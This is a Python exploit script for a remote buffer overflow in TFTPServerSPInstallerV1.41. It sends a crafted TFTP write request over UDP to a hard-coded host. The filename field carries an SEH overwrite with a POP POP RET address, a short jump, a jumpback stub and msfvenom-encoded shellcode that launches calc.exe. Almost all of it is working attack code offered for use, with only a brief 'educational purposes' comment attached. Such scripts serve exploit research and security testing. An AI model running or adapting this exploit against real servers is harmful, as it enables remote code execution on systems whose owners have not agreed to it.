Remote BoF for TFTPServerSPInstallerV1.41
#!/usr/bin/python
# Remote BoF for TFTPServerSPInstallerV1.41.
# Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts
#
import socket
import sys
host = '172.16.155.129'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
# This is the original offset size 1496. Kept commented for reference.
#filename = "A" * 1496 + "\x4F\x48\x40" # + "\x43" * 3500 # 0040484F POP POP RET
# Evil shellcode. Pop a calculator!
#msfvenom -p windows/exec cmd=calc.exe EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x2f" -f python
#Payload size: 220 bytes
buf = ""
buf += "\xbb\xf3\x84\xd0\x15\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc\x03\x5a\xfc\x66"
buf += "\x25\xe9\xea\xe5\xc6\x12\xea\x89\x4f\xf7\xdb\x89\x34"
buf += "\x73\x4b\x3a\x3e\xd1\x67\xb1\x12\xc2\xfc\xb7\xba\xe5"
buf += "\xb5\x72\x9d\xc8\x46\x2e\xdd\x4b\xc4\x2d\x32\xac\xf5"
buf += "\xfd\x47\xad\x32\xe3\xaa\xff\xeb\x6f\x18\x10\x98\x3a"
buf += "\xa1\x9b\xd2\xab\xa1\x78\xa2\xca\x80\x2e\xb9\x94\x02"
buf += "\xd0\x6e\xad\x0a\xca\x73\x88\xc5\x61\x47\x66\xd4\xa3"
buf += "\x96\x87\x7b\x8a\x17\x7a\x85\xca\x9f\x65\xf0\x22\xdc"
buf += "\x18\x03\xf1\x9f\xc6\x86\xe2\x07\x8c\x31\xcf\xb6\x41"
buf += "\xa7\x84\xb4\x2e\xa3\xc3\xd8\xb1\x60\x78\xe4\x3a\x87"
buf += "\xaf\x6d\x78\xac\x6b\x36\xda\xcd\x2a\x92\x8d\xf2\x2d"
buf += "\x7d\x71\x57\x25\x93\x66\xea\x64\xf9\x79\x78\x13\x4f"
buf += "\x79\x82\x1c\xff\x12\xb3\x97\x90\x65\x4c\x72\xd5\x94"
buf += "\xbd\x4f\xc3\x01\x64\x3a\xae\x4f\x97\x90\xec\x69\x14"
buf += "\x11\x8c\x8d\x04\x50\x89\xca\x82\x88\xe3\x43\x67\xaf"
buf += "\x50\x63\xa2\xcc\x37\xf7\x2e\x3d\xd2\x7f\xd4\x41"
# Jumpback shellcode from phrack 62 article 7.
jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"
# Sending of staged shellcode. Read from right to left.
# Ret addr(POP POP RET) ---> 1st stage shell short jump ------> 2nd stage long jumback shellcode ---> evil buf
filename = "\xcc" * 973 + "\x90" * 252 + buf + "\x90" * 30 + jumpback + "\xeb\xd0\x90\x90" + "\x4F\x48\x40"
# Send payload off
mode = "netascii"
payload = "\x00\x02" + filename + "\x00" + mode+ "\0"
s.sendto(payload, (host, port))